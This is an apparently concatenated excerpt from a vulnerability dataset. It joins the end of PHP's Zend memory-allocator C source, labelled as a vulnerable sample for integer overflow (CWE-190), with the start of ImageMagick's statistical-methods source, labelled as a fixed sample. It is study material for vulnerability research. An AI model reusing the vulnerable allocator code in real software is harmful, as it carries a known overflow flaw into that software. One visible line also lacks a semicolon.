zend_mm_shutdown(alloc_globals->mm_heap, 1, 1);
}
#endif
ZEND_API void start_memory_manager(void)
{
#ifdef ZTS
ts_allocate_id(&alloc_globals_id, sizeof(zend_alloc_globals), (ts_allocate_ctor) alloc_globals_ctor, (ts_allocate_dtor) alloc_globals_dtor);
#else
alloc_globals_ctor(&alloc_globals);
#endif
#ifndef _WIN32
# if defined(_SC_PAGESIZE)
REAL_PAGE_SIZE = sysconf(_SC_PAGESIZE);
# elif defined(_SC_PAGE_SIZE)
REAL_PAGE_SIZE = sysconf(_SC_PAGE_SIZE);
# endif
#endif
}
ZEND_API zend_mm_heap *zend_mm_set_heap(zend_mm_heap *new_heap)
{
zend_mm_heap *old_heap;
old_heap = AG(mm_heap);
AG(mm_heap) = (zend_mm_heap*)new_heap;
return (zend_mm_heap*)old_heap;
}
ZEND_API zend_mm_heap *zend_mm_get_heap(void)
{
return AG(mm_heap);
}
ZEND_API int zend_mm_is_custom_heap(zend_mm_heap *new_heap)
{
#if ZEND_MM_CUSTOM
return AG(mm_heap)->use_custom_heap;
#else
return 0;
#endif
}
ZEND_API void zend_mm_set_custom_handlers(zend_mm_heap *heap,
void* (*_malloc)(size_t),
void (*_free)(void*),
void* (*_realloc)(void*, size_t))
{
#if ZEND_MM_CUSTOM
zend_mm_heap *_heap = (zend_mm_heap*)heap;
_heap->use_custom_heap = ZEND_MM_CUSTOM_HEAP_STD;
_heap->custom_heap.std._malloc = _malloc;
_heap->custom_heap.std._free = _free;
_heap->custom_heap.std._realloc = _realloc;
#endif
}
ZEND_API void zend_mm_get_custom_handlers(zend_mm_heap *heap,
void* (**_malloc)(size_t),
void (**_free)(void*),
void* (**_realloc)(void*, size_t))
{
#if ZEND_MM_CUSTOM
zend_mm_heap *_heap = (zend_mm_heap*)heap;
if (heap->use_custom_heap) {
*_malloc = _heap->custom_heap.std._malloc;
*_free = _heap->custom_heap.std._free;
*_realloc = _heap->custom_heap.std._realloc;
} else {
*_malloc = NULL;
*_free = NULL;
*_realloc = NULL;
}
#else
*_malloc = NULL;
*_free = NULL;
*_realloc = NULL;
#endif
}
#if ZEND_DEBUG
ZEND_API void zend_mm_set_custom_debug_handlers(zend_mm_heap *heap,
void* (*_malloc)(size_t ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC),
void (*_free)(void* ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC),
void* (*_realloc)(void*, size_t ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC))
{
#if ZEND_MM_CUSTOM
zend_mm_heap *_heap = (zend_mm_heap*)heap;
_heap->use_custom_heap = ZEND_MM_CUSTOM_HEAP_DEBUG;
_heap->custom_heap.debug._malloc = _malloc;
_heap->custom_heap.debug._free = _free;
_heap->custom_heap.debug._realloc = _realloc;
#endif
}
#endif
ZEND_API zend_mm_storage *zend_mm_get_storage(zend_mm_heap *heap)
{
#if ZEND_MM_STORAGE
return heap->storage;
#else
return NULL
#endif
}
ZEND_API zend_mm_heap *zend_mm_startup(void)
{
return zend_mm_init();
}
ZEND_API zend_mm_heap *zend_mm_startup_ex(const zend_mm_handlers *handlers, void *data, size_t data_size)
{
#if ZEND_MM_STORAGE
zend_mm_storage tmp_storage, *storage;
zend_mm_chunk *chunk;
zend_mm_heap *heap;
memcpy((zend_mm_handlers*)&tmp_storage.handlers, handlers, sizeof(zend_mm_handlers));
tmp_storage.data = data;
chunk = (zend_mm_chunk*)handlers->chunk_alloc(&tmp_storage, ZEND_MM_CHUNK_SIZE, ZEND_MM_CHUNK_SIZE);
if (UNEXPECTED(chunk == NULL)) {
#if ZEND_MM_ERROR
#ifdef _WIN32
stderr_last_error("Can't initialize heap");
#else
fprintf(stderr, "\nCan't initialize heap: [%d] %s\n", errno, strerror(errno));
#endif
#endif
return NULL;
}
heap = &chunk->heap_slot;
chunk->heap = heap;
chunk->next = chunk;
chunk->prev = chunk;
chunk->free_pages = ZEND_MM_PAGES - ZEND_MM_FIRST_PAGE;
chunk->free_tail = ZEND_MM_FIRST_PAGE;
chunk->num = 0;
chunk->free_map[0] = (Z_L(1) << ZEND_MM_FIRST_PAGE) - 1;
chunk->map[0] = ZEND_MM_LRUN(ZEND_MM_FIRST_PAGE);
heap->main_chunk = chunk;
heap->cached_chunks = NULL;
heap->chunks_count = 1;
heap->peak_chunks_count = 1;
heap->cached_chunks_count = 0;
heap->avg_chunks_count = 1.0;
#if ZEND_MM_STAT || ZEND_MM_LIMIT
heap->real_size = ZEND_MM_CHUNK_SIZE;
#endif
#if ZEND_MM_STAT
heap->real_peak = ZEND_MM_CHUNK_SIZE;
heap->size = 0;
heap->peak = 0;
#endif
#if ZEND_MM_LIMIT
heap->limit = (Z_L(-1) >> Z_L(1));
heap->overflow = 0;
#endif
#if ZEND_MM_CUSTOM
heap->use_custom_heap = 0;
#endif
heap->storage = &tmp_storage;
heap->huge_list = NULL;
memset(heap->free_slot, 0, sizeof(heap->free_slot));
storage = _zend_mm_alloc(heap, sizeof(zend_mm_storage) + data_size ZEND_FILE_LINE_CC ZEND_FILE_LINE_CC);
if (!storage) {
handlers->chunk_free(&tmp_storage, chunk, ZEND_MM_CHUNK_SIZE);
#if ZEND_MM_ERROR
#ifdef _WIN32
stderr_last_error("Can't initialize heap");
#else
fprintf(stderr, "\nCan't initialize heap: [%d] %s\n", errno, strerror(errno));
#endif
#endif
return NULL;
}
memcpy(storage, &tmp_storage, sizeof(zend_mm_storage));
if (data) {
storage->data = (void*)(((char*)storage + sizeof(zend_mm_storage)));
memcpy(storage->data, data, data_size);
}
heap->storage = storage;
return heap;
#else
return NULL;
#endif
}
static ZEND_COLD ZEND_NORETURN void zend_out_of_memory(void)
{
fprintf(stderr, "Out of memory\n");
exit(1);
}
ZEND_API void * __zend_malloc(size_t len)
{
void *tmp = malloc(len);
if (EXPECTED(tmp)) {
return tmp;
}
zend_out_of_memory();
}
ZEND_API void * __zend_calloc(size_t nmemb, size_t len)
{
void *tmp = _safe_malloc(nmemb, len, 0);
memset(tmp, 0, nmemb * len);
return tmp;
}
ZEND_API void * __zend_realloc(void *p, size_t len)
{
p = realloc(p, len);
if (EXPECTED(p)) {
return p;
}
zend_out_of_memory();
}
/*
* Local variables:
* tab-width: 4
* c-basic-offset: 4
* indent-tabs-mode: t
* End:
*/
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_5262_0 |
crossvul-cpp_data_good_4425_0 | /*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% SSSSS TTTTT AAA TTTTT IIIII SSSSS TTTTT IIIII CCCC %
% SS T A A T I SS T I C %
% SSS T AAAAA T I SSS T I C %
% SS T A A T I SS T I C %
% SSSSS T A A T IIIII SSSSS T IIIII CCCC %
% %
% %
% MagickCore Image Statistical Methods %
% %
% Software Design %
% Cristy %
% July 1992 %
% %
% %
% Copyright 1999-2019 ImageMagick Studio LLC, a non-profit organization %
% dedicated to making software imaging solutions freely available. %
% %
% You may not use this file except in compliance with the License. You may %
% obtain a copy of the License at %
% %
% https://imagemagick.org/script/license.php %
% %
% Unless required by applicable law or agreed to in writing, software %
% distributed under the License is distributed on an "AS IS" BASIS, %
% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. %
% See the License for the specific language governing permissions and %
% limitations under the License. %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
%
%
*/
/*
Include declarations.
*/
#include "magick/studio.h"
#include "magick/accelerate-private.h"
#include "magick/animate.h"
#include "magick/animate.h"
#include "magick/blob.h"
#include "magick/blob-private.h"
#include "magick/cache.h"
#include "magick/cache-private.h"
#include "magick/cache-view.h"
#include "magick/client.h"
#include "magick/color.h"
#include "magick/color-private.h"
#include "magick/colorspace.h"
#include "magick/colorspace-private.h"
#include "magick/composite.h"
#include "magick/composite-private.h"
#include "magick/compress.h"
#include "magick/constitute.h"
#include "magick/deprecate.h"
#include "magick/display.h"
#include "magick/draw.h"
#include "magick/enhance.h"
#include "magick/exception.h"
#include "magick/exception-private.h"
#include "magick/gem.h"
#include "magick/geometry.h"
#include "magick/list.h"
#include "magick/image-private.h"
#include "magick/magic.h"
#include "magick/magick.h"
#include "magick/memory_.h"
#include "magick/module.h"
#include "magick/monitor.h"
#include "magick/monitor-private.h"
#include "magick/option.h"
#include "magick/paint.h"
#include "magick/pixel-private.h"
#include "magick/profile.h"
#include "magick/property.h"
#include "magick/quantize.h"
#include "magick/random_.h"
#include "magick/random-private.h"
#include "magick/resource_.h"
#include "magick/segment.h"
#include "magick/semaphore.h"
#include "magick/signature-private.h"
#include "magick/statistic.h"
#include "magick/string_.h"
#include "magick/thread-private.h"
#include "magick/timer.h"
#include "magick/utility.h"
#include "magick/version.h"
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% E v a l u a t e I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% EvaluateImage() applies a value to the image with an arithmetic, relational,
% or logical operator to an image. Use these operations to lighten or darken
% an image, to increase or decrease contrast in an image, or to produce the
% "negative" of an image.
%
% The format of the EvaluateImageChannel method is:
%
% MagickBooleanType EvaluateImage(Image *image,
% const MagickEvaluateOperator op,const double value,
% ExceptionInfo *exception)
% MagickBooleanType EvaluateImages(Image *images,
% const MagickEvaluateOperator op,const double value,
% ExceptionInfo *exception)
% MagickBooleanType EvaluateImageChannel(Image *image,
% const ChannelType channel,const MagickEvaluateOperator op,
% const double value,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o channel: the channel.
%
% o op: A channel op.
%
% o value: A value value.
%
% o exception: return any errors or warnings in this structure.
%
*/
static MagickPixelPacket **DestroyPixelThreadSet(const Image *images,
MagickPixelPacket **pixels)
{
register ssize_t
i;
size_t
rows;
assert(pixels != (MagickPixelPacket **) NULL);
rows=MagickMax(GetImageListLength(images),
(size_t) GetMagickResourceLimit(ThreadResource));
for (i=0; i < (ssize_t) rows; i++)
if (pixels[i] != (MagickPixelPacket *) NULL)
pixels[i]=(MagickPixelPacket *) RelinquishMagickMemory(pixels[i]);
pixels=(MagickPixelPacket **) RelinquishMagickMemory(pixels);
return(pixels);
}
static MagickPixelPacket **AcquirePixelThreadSet(const Image *images)
{
const Image
*next;
MagickPixelPacket
**pixels;
register ssize_t
i,
j;
size_t
columns,
rows;
rows=MagickMax(GetImageListLength(images),
(size_t) GetMagickResourceLimit(ThreadResource));
pixels=(MagickPixelPacket **) AcquireQuantumMemory(rows,sizeof(*pixels));
if (pixels == (MagickPixelPacket **) NULL)
return((MagickPixelPacket **) NULL);
(void) memset(pixels,0,rows*sizeof(*pixels));
columns=GetImageListLength(images);
for (next=images; next != (Image *) NULL; next=next->next)
columns=MagickMax(next->columns,columns);
for (i=0; i < (ssize_t) rows; i++)
{
pixels[i]=(MagickPixelPacket *) AcquireQuantumMemory(columns,
sizeof(**pixels));
if (pixels[i] == (MagickPixelPacket *) NULL)
return(DestroyPixelThreadSet(images,pixels));
for (j=0; j < (ssize_t) columns; j++)
GetMagickPixelPacket(images,&pixels[i][j]);
}
return(pixels);
}
static inline double EvaluateMax(const double x,const double y)
{
if (x > y)
return(x);
return(y);
}
#if defined(__cplusplus) || defined(c_plusplus)
extern "C" {
#endif
static int IntensityCompare(const void *x,const void *y)
{
const MagickPixelPacket
*color_1,
*color_2;
int
intensity;
color_1=(const MagickPixelPacket *) x;
color_2=(const MagickPixelPacket *) y;
intensity=(int) MagickPixelIntensity(color_2)-(int)
MagickPixelIntensity(color_1);
return(intensity);
}
#if defined(__cplusplus) || defined(c_plusplus)
}
#endif
static MagickRealType ApplyEvaluateOperator(RandomInfo *random_info,
const Quantum pixel,const MagickEvaluateOperator op,
const MagickRealType value)
{
MagickRealType
result;
result=0.0;
switch (op)
{
case UndefinedEvaluateOperator:
break;
case AbsEvaluateOperator:
{
result=(MagickRealType) fabs((double) (pixel+value));
break;
}
case AddEvaluateOperator:
{
result=(MagickRealType) (pixel+value);
break;
}
case AddModulusEvaluateOperator:
{
/*
This returns a 'floored modulus' of the addition which is a
positive result. It differs from % or fmod() which returns a
'truncated modulus' result, where floor() is replaced by trunc()
and could return a negative result (which is clipped).
*/
result=pixel+value;
result-=(QuantumRange+1.0)*floor((double) result/(QuantumRange+1.0));
break;
}
case AndEvaluateOperator:
{
result=(MagickRealType) ((ssize_t) pixel & (ssize_t) (value+0.5));
break;
}
case CosineEvaluateOperator:
{
result=(MagickRealType) (QuantumRange*(0.5*cos((double) (2.0*MagickPI*
QuantumScale*pixel*value))+0.5));
break;
}
case DivideEvaluateOperator:
{
result=pixel/(value == 0.0 ? 1.0 : value);
break;
}
case ExponentialEvaluateOperator:
{
result=(MagickRealType) (QuantumRange*exp((double) (value*QuantumScale*
pixel)));
break;
}
case GaussianNoiseEvaluateOperator:
{
result=(MagickRealType) GenerateDifferentialNoise(random_info,pixel,
GaussianNoise,value);
break;
}
case ImpulseNoiseEvaluateOperator:
{
result=(MagickRealType) GenerateDifferentialNoise(random_info,pixel,
ImpulseNoise,value);
break;
}
case LaplacianNoiseEvaluateOperator:
{
result=(MagickRealType) GenerateDifferentialNoise(random_info,pixel,
LaplacianNoise,value);
break;
}
case LeftShiftEvaluateOperator:
{
result=(MagickRealType) ((ssize_t) pixel << (ssize_t) (value+0.5));
break;
}
case LogEvaluateOperator:
{
if ((QuantumScale*pixel) >= MagickEpsilon)
result=(MagickRealType) (QuantumRange*log((double) (QuantumScale*value*
pixel+1.0))/log((double) (value+1.0)));
break;
}
case MaxEvaluateOperator:
{
result=(MagickRealType) EvaluateMax((double) pixel,value);
break;
}
case MeanEvaluateOperator:
{
result=(MagickRealType) (pixel+value);
break;
}
case MedianEvaluateOperator:
{
result=(MagickRealType) (pixel+value);
break;
}
case MinEvaluateOperator:
{
result=(MagickRealType) MagickMin((double) pixel,value);
break;
}
case MultiplicativeNoiseEvaluateOperator:
{
result=(MagickRealType) GenerateDifferentialNoise(random_info,pixel,
MultiplicativeGaussianNoise,value);
break;
}
case MultiplyEvaluateOperator:
{
result=(MagickRealType) (value*pixel);
break;
}
case OrEvaluateOperator:
{
result=(MagickRealType) ((ssize_t) pixel | (ssize_t) (value+0.5));
break;
}
case PoissonNoiseEvaluateOperator:
{
result=(MagickRealType) GenerateDifferentialNoise(random_info,pixel,
PoissonNoise,value);
break;
}
case PowEvaluateOperator:
{
result=(MagickRealType) (QuantumRange*pow((double) (QuantumScale*pixel),
(double) value));
break;
}
case RightShiftEvaluateOperator:
{
result=(MagickRealType) ((ssize_t) pixel >> (ssize_t) (value+0.5));
break;
}
case RootMeanSquareEvaluateOperator:
{
result=(MagickRealType) (pixel*pixel+value);
break;
}
case SetEvaluateOperator:
{
result=value;
break;
}
case SineEvaluateOperator:
{
result=(MagickRealType) (QuantumRange*(0.5*sin((double) (2.0*MagickPI*
QuantumScale*pixel*value))+0.5));
break;
}
case SubtractEvaluateOperator:
{
result=(MagickRealType) (pixel-value);
break;
}
case SumEvaluateOperator:
{
result=(MagickRealType) (pixel+value);
break;
}
case ThresholdEvaluateOperator:
{
result=(MagickRealType) (((MagickRealType) pixel <= value) ? 0 :
QuantumRange);
break;
}
case ThresholdBlackEvaluateOperator:
{
result=(MagickRealType) (((MagickRealType) pixel <= value) ? 0 : pixel);
break;
}
case ThresholdWhiteEvaluateOperator:
{
result=(MagickRealType) (((MagickRealType) pixel > value) ? QuantumRange :
pixel);
break;
}
case UniformNoiseEvaluateOperator:
{
result=(MagickRealType) GenerateDifferentialNoise(random_info,pixel,
UniformNoise,value);
break;
}
case XorEvaluateOperator:
{
result=(MagickRealType) ((ssize_t) pixel ^ (ssize_t) (value+0.5));
break;
}
}
return(result);
}
static Image *AcquireImageCanvas(const Image *images,ExceptionInfo *exception)
{
const Image
*p,
*q;
size_t
columns,
number_channels,
rows;
q=images;
columns=images->columns;
rows=images->rows;
number_channels=0;
for (p=images; p != (Image *) NULL; p=p->next)
{
size_t
channels;
channels=3;
if (p->matte != MagickFalse)
channels+=1;
if (p->colorspace == CMYKColorspace)
channels+=1;
if (channels > number_channels)
{
number_channels=channels;
q=p;
}
if (p->columns > columns)
columns=p->columns;
if (p->rows > rows)
rows=p->rows;
}
return(CloneImage(q,columns,rows,MagickTrue,exception));
}
MagickExport MagickBooleanType EvaluateImage(Image *image,
const MagickEvaluateOperator op,const double value,ExceptionInfo *exception)
{
MagickBooleanType
status;
status=EvaluateImageChannel(image,CompositeChannels,op,value,exception);
return(status);
}
MagickExport Image *EvaluateImages(const Image *images,
const MagickEvaluateOperator op,ExceptionInfo *exception)
{
#define EvaluateImageTag "Evaluate/Image"
CacheView
*evaluate_view;
Image
*image;
MagickBooleanType
status;
MagickOffsetType
progress;
MagickPixelPacket
**magick_restrict evaluate_pixels,
zero;
RandomInfo
**magick_restrict random_info;
size_t
number_images;
ssize_t
y;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
unsigned long
key;
#endif
assert(images != (Image *) NULL);
assert(images->signature == MagickCoreSignature);
if (images->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",images->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
image=AcquireImageCanvas(images,exception);
if (image == (Image *) NULL)
return((Image *) NULL);
if (SetImageStorageClass(image,DirectClass) == MagickFalse)
{
InheritException(exception,&image->exception);
image=DestroyImage(image);
return((Image *) NULL);
}
evaluate_pixels=AcquirePixelThreadSet(images);
if (evaluate_pixels == (MagickPixelPacket **) NULL)
{
image=DestroyImage(image);
(void) ThrowMagickException(exception,GetMagickModule(),
ResourceLimitError,"MemoryAllocationFailed","`%s'",images->filename);
return((Image *) NULL);
}
/*
Evaluate image pixels.
*/
status=MagickTrue;
progress=0;
number_images=GetImageListLength(images);
GetMagickPixelPacket(images,&zero);
random_info=AcquireRandomInfoThreadSet();
evaluate_view=AcquireAuthenticCacheView(image,exception);
if (op == MedianEvaluateOperator)
{
#if defined(MAGICKCORE_OPENMP_SUPPORT)
key=GetRandomSecretKey(random_info[0]);
#pragma omp parallel for schedule(static) shared(progress,status) \
magick_number_threads(image,images,image->rows,key == ~0UL)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
CacheView
*image_view;
const Image
*next;
const int
id = GetOpenMPThreadId();
register IndexPacket
*magick_restrict evaluate_indexes;
register MagickPixelPacket
*evaluate_pixel;
register PixelPacket
*magick_restrict q;
register ssize_t
x;
if (status == MagickFalse)
continue;
q=QueueCacheViewAuthenticPixels(evaluate_view,0,y,image->columns,1,
exception);
if (q == (PixelPacket *) NULL)
{
status=MagickFalse;
continue;
}
evaluate_indexes=GetCacheViewAuthenticIndexQueue(evaluate_view);
evaluate_pixel=evaluate_pixels[id];
for (x=0; x < (ssize_t) image->columns; x++)
{
register ssize_t
i;
for (i=0; i < (ssize_t) number_images; i++)
evaluate_pixel[i]=zero;
next=images;
for (i=0; i < (ssize_t) number_images; i++)
{
register const IndexPacket
*indexes;
register const PixelPacket
*p;
image_view=AcquireVirtualCacheView(next,exception);
p=GetCacheViewVirtualPixels(image_view,x,y,1,1,exception);
if (p == (const PixelPacket *) NULL)
{
image_view=DestroyCacheView(image_view);
break;
}
indexes=GetCacheViewVirtualIndexQueue(image_view);
evaluate_pixel[i].red=ApplyEvaluateOperator(random_info[id],
GetPixelRed(p),op,evaluate_pixel[i].red);
evaluate_pixel[i].green=ApplyEvaluateOperator(random_info[id],
GetPixelGreen(p),op,evaluate_pixel[i].green);
evaluate_pixel[i].blue=ApplyEvaluateOperator(random_info[id],
GetPixelBlue(p),op,evaluate_pixel[i].blue);
evaluate_pixel[i].opacity=ApplyEvaluateOperator(random_info[id],
GetPixelAlpha(p),op,evaluate_pixel[i].opacity);
if (image->colorspace == CMYKColorspace)
evaluate_pixel[i].index=ApplyEvaluateOperator(random_info[id],
*indexes,op,evaluate_pixel[i].index);
image_view=DestroyCacheView(image_view);
next=GetNextImageInList(next);
}
qsort((void *) evaluate_pixel,number_images,sizeof(*evaluate_pixel),
IntensityCompare);
SetPixelRed(q,ClampToQuantum(evaluate_pixel[i/2].red));
SetPixelGreen(q,ClampToQuantum(evaluate_pixel[i/2].green));
SetPixelBlue(q,ClampToQuantum(evaluate_pixel[i/2].blue));
SetPixelAlpha(q,ClampToQuantum(evaluate_pixel[i/2].opacity));
if (image->colorspace == CMYKColorspace)
SetPixelIndex(evaluate_indexes+i,ClampToQuantum(
evaluate_pixel[i/2].index));
q++;
}
if (SyncCacheViewAuthenticPixels(evaluate_view,exception) == MagickFalse)
status=MagickFalse;
if (images->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp atomic
#endif
progress++;
proceed=SetImageProgress(images,EvaluateImageTag,progress,
image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
}
else
{
#if defined(MAGICKCORE_OPENMP_SUPPORT)
key=GetRandomSecretKey(random_info[0]);
#pragma omp parallel for schedule(static) shared(progress,status) \
magick_number_threads(image,images,image->rows,key == ~0UL)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
CacheView
*image_view;
const Image
*next;
const int
id = GetOpenMPThreadId();
register IndexPacket
*magick_restrict evaluate_indexes;
register ssize_t
i,
x;
register MagickPixelPacket
*evaluate_pixel;
register PixelPacket
*magick_restrict q;
if (status == MagickFalse)
continue;
q=QueueCacheViewAuthenticPixels(evaluate_view,0,y,image->columns,1,
exception);
if (q == (PixelPacket *) NULL)
{
status=MagickFalse;
continue;
}
evaluate_indexes=GetCacheViewAuthenticIndexQueue(evaluate_view);
evaluate_pixel=evaluate_pixels[id];
for (x=0; x < (ssize_t) image->columns; x++)
evaluate_pixel[x]=zero;
next=images;
for (i=0; i < (ssize_t) number_images; i++)
{
register const IndexPacket
*indexes;
register const PixelPacket
*p;
image_view=AcquireVirtualCacheView(next,exception);
p=GetCacheViewVirtualPixels(image_view,0,y,image->columns,1,
exception);
if (p == (const PixelPacket *) NULL)
{
image_view=DestroyCacheView(image_view);
break;
}
indexes=GetCacheViewVirtualIndexQueue(image_view);
for (x=0; x < (ssize_t) image->columns; x++)
{
evaluate_pixel[x].red=ApplyEvaluateOperator(random_info[id],
GetPixelRed(p),i == 0 ? AddEvaluateOperator : op,
evaluate_pixel[x].red);
evaluate_pixel[x].green=ApplyEvaluateOperator(random_info[id],
GetPixelGreen(p),i == 0 ? AddEvaluateOperator : op,
evaluate_pixel[x].green);
evaluate_pixel[x].blue=ApplyEvaluateOperator(random_info[id],
GetPixelBlue(p),i == 0 ? AddEvaluateOperator : op,
evaluate_pixel[x].blue);
evaluate_pixel[x].opacity=ApplyEvaluateOperator(random_info[id],
GetPixelAlpha(p),i == 0 ? AddEvaluateOperator : op,
evaluate_pixel[x].opacity);
if (image->colorspace == CMYKColorspace)
evaluate_pixel[x].index=ApplyEvaluateOperator(random_info[id],
GetPixelIndex(indexes+x),i == 0 ? AddEvaluateOperator : op,
evaluate_pixel[x].index);
p++;
}
image_view=DestroyCacheView(image_view);
next=GetNextImageInList(next);
}
if (op == MeanEvaluateOperator)
for (x=0; x < (ssize_t) image->columns; x++)
{
evaluate_pixel[x].red/=number_images;
evaluate_pixel[x].green/=number_images;
evaluate_pixel[x].blue/=number_images;
evaluate_pixel[x].opacity/=number_images;
evaluate_pixel[x].index/=number_images;
}
if (op == RootMeanSquareEvaluateOperator)
for (x=0; x < (ssize_t) image->columns; x++)
{
evaluate_pixel[x].red=sqrt((double) evaluate_pixel[x].red/
number_images);
evaluate_pixel[x].green=sqrt((double) evaluate_pixel[x].green/
number_images);
evaluate_pixel[x].blue=sqrt((double) evaluate_pixel[x].blue/
number_images);
evaluate_pixel[x].opacity=sqrt((double) evaluate_pixel[x].opacity/
number_images);
evaluate_pixel[x].index=sqrt((double) evaluate_pixel[x].index/
number_images);
}
if (op == MultiplyEvaluateOperator)
for (x=0; x < (ssize_t) image->columns; x++)
{
register ssize_t
j;
for (j=0; j < (ssize_t) (number_images-1); j++)
{
evaluate_pixel[x].red*=(MagickRealType) QuantumScale;
evaluate_pixel[x].green*=(MagickRealType) QuantumScale;
evaluate_pixel[x].blue*=(MagickRealType) QuantumScale;
evaluate_pixel[x].opacity*=(MagickRealType) QuantumScale;
evaluate_pixel[x].index*=(MagickRealType) QuantumScale;
}
}
for (x=0; x < (ssize_t) image->columns; x++)
{
SetPixelRed(q,ClampToQuantum(evaluate_pixel[x].red));
SetPixelGreen(q,ClampToQuantum(evaluate_pixel[x].green));
SetPixelBlue(q,ClampToQuantum(evaluate_pixel[x].blue));
SetPixelAlpha(q,ClampToQuantum(evaluate_pixel[x].opacity));
if (image->colorspace == CMYKColorspace)
SetPixelIndex(evaluate_indexes+x,ClampToQuantum(
evaluate_pixel[x].index));
q++;
}
if (SyncCacheViewAuthenticPixels(evaluate_view,exception) == MagickFalse)
status=MagickFalse;
if (images->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
proceed=SetImageProgress(images,EvaluateImageTag,progress++,
image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
}
evaluate_view=DestroyCacheView(evaluate_view);
evaluate_pixels=DestroyPixelThreadSet(images,evaluate_pixels);
random_info=DestroyRandomInfoThreadSet(random_info);
if (status == MagickFalse)
image=DestroyImage(image);
return(image);
}
MagickExport MagickBooleanType EvaluateImageChannel(Image *image,
const ChannelType channel,const MagickEvaluateOperator op,const double value,
ExceptionInfo *exception)
{
CacheView
*image_view;
MagickBooleanType
status;
MagickOffsetType
progress;
RandomInfo
**magick_restrict random_info;
ssize_t
y;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
unsigned long
key;
#endif
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
if (SetImageStorageClass(image,DirectClass) == MagickFalse)
{
InheritException(exception,&image->exception);
return(MagickFalse);
}
status=MagickTrue;
progress=0;
random_info=AcquireRandomInfoThreadSet();
image_view=AcquireAuthenticCacheView(image,exception);
#if defined(MAGICKCORE_OPENMP_SUPPORT)
key=GetRandomSecretKey(random_info[0]);
#pragma omp parallel for schedule(static) shared(progress,status) \
magick_number_threads(image,image,image->rows,key == ~0UL)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
const int
id = GetOpenMPThreadId();
register IndexPacket
*magick_restrict indexes;
register PixelPacket
*magick_restrict q;
register ssize_t
x;
if (status == MagickFalse)
continue;
q=GetCacheViewAuthenticPixels(image_view,0,y,image->columns,1,exception);
if (q == (PixelPacket *) NULL)
{
status=MagickFalse;
continue;
}
indexes=GetCacheViewAuthenticIndexQueue(image_view);
for (x=0; x < (ssize_t) image->columns; x++)
{
MagickRealType
result;
if ((channel & RedChannel) != 0)
{
result=ApplyEvaluateOperator(random_info[id],GetPixelRed(q),op,value);
if (op == MeanEvaluateOperator)
result/=2.0;
SetPixelRed(q,ClampToQuantum(result));
}
if ((channel & GreenChannel) != 0)
{
result=ApplyEvaluateOperator(random_info[id],GetPixelGreen(q),op,
value);
if (op == MeanEvaluateOperator)
result/=2.0;
SetPixelGreen(q,ClampToQuantum(result));
}
if ((channel & BlueChannel) != 0)
{
result=ApplyEvaluateOperator(random_info[id],GetPixelBlue(q),op,
value);
if (op == MeanEvaluateOperator)
result/=2.0;
SetPixelBlue(q,ClampToQuantum(result));
}
if ((channel & OpacityChannel) != 0)
{
if (image->matte == MagickFalse)
{
result=ApplyEvaluateOperator(random_info[id],GetPixelOpacity(q),
op,value);
if (op == MeanEvaluateOperator)
result/=2.0;
SetPixelOpacity(q,ClampToQuantum(result));
}
else
{
result=ApplyEvaluateOperator(random_info[id],GetPixelAlpha(q),
op,value);
if (op == MeanEvaluateOperator)
result/=2.0;
SetPixelAlpha(q,ClampToQuantum(result));
}
}
if (((channel & IndexChannel) != 0) && (indexes != (IndexPacket *) NULL))
{
result=ApplyEvaluateOperator(random_info[id],GetPixelIndex(indexes+x),
op,value);
if (op == MeanEvaluateOperator)
result/=2.0;
SetPixelIndex(indexes+x,ClampToQuantum(result));
}
q++;
}
if (SyncCacheViewAuthenticPixels(image_view,exception) == MagickFalse)
status=MagickFalse;
if (image->progress_monitor != (MagickProgressMonitor) NULL)
{
MagickBooleanType
proceed;
proceed=SetImageProgress(image,EvaluateImageTag,progress++,image->rows);
if (proceed == MagickFalse)
status=MagickFalse;
}
}
image_view=DestroyCacheView(image_view);
random_info=DestroyRandomInfoThreadSet(random_info);
return(status);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% F u n c t i o n I m a g e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% FunctionImage() applies a value to the image with an arithmetic, relational,
% or logical operator to an image. Use these operations to lighten or darken
% an image, to increase or decrease contrast in an image, or to produce the
% "negative" of an image.
%
% The format of the FunctionImageChannel method is:
%
% MagickBooleanType FunctionImage(Image *image,
